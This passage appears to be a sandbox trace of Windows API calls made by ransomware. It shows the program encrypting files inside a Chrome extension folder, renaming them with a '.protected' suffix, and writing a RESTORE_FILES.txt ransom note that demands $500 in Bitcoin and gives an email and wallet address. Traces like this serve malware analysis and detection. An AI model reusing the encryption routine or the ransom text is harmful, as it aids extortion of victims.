lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.921] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.921] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.921] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.921] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\.") returned 148 [0079.921] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.921] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.921] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.921] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.921] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.921] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\..") returned 149 [0079.921] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.921] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.921] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") 
returned -1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.922] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.922] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.922] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.922] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.923] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.923] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.923] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.923] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.923] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.923] CloseHandle (hObject=0x168) returned 1 [0079.923] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.protected") returned 170 [0079.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0079.924] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.924] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.924] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 164 [0079.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x164 [0079.924] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.924] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.925] lstrlenA (lpString="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") returned 684 [0079.925] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.925] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.925] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.925] CloseHandle (hObject=0x164) returned 1 [0079.925] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.925] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.925] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\RESTORE_FILES.txt") returned 158 [0079.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.925] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.925] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.926] lstrlenA (lpString="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") returned 684 [0079.926] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.926] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.926] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.926] CloseHandle (hObject=0x160) returned 1 [0079.926] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0079.926] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata") returned 141 [0079.927] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0079.927] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*") returned 143 [0079.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) 
returned 0x47bbd0 [0079.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.927] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.927] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.927] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.927] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\.") returned 143 [0079.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.927] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.927] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.927] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.927] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.927] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\..") returned 144 [0079.927] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0079.927] lstrcmpiW 
(lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.927] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0079.927] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0079.927] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.927] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.928] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0079.928] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.928] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0079.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.928] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0079.928] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2769, lpOverlapped=0x0) returned 1 [0079.936] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd897, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.936] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2769, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2769, lpOverlapped=0x0) returned 1 [0079.936] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.936] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.936] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.936] CloseHandle (hObject=0x164) returned 1 [0079.937] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.protected") returned 174 [0079.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.protected")) returned 1 [0079.937] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.937] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.937] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\RESTORE_FILES.txt") returned 159 [0079.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.938] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.938] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.939] lstrlenA (lpString="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") returned 684 [0079.939] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.939] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.939] CloseHandle (hObject=0x160) returned 1 [0079.939] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0079.939] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0079.939] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 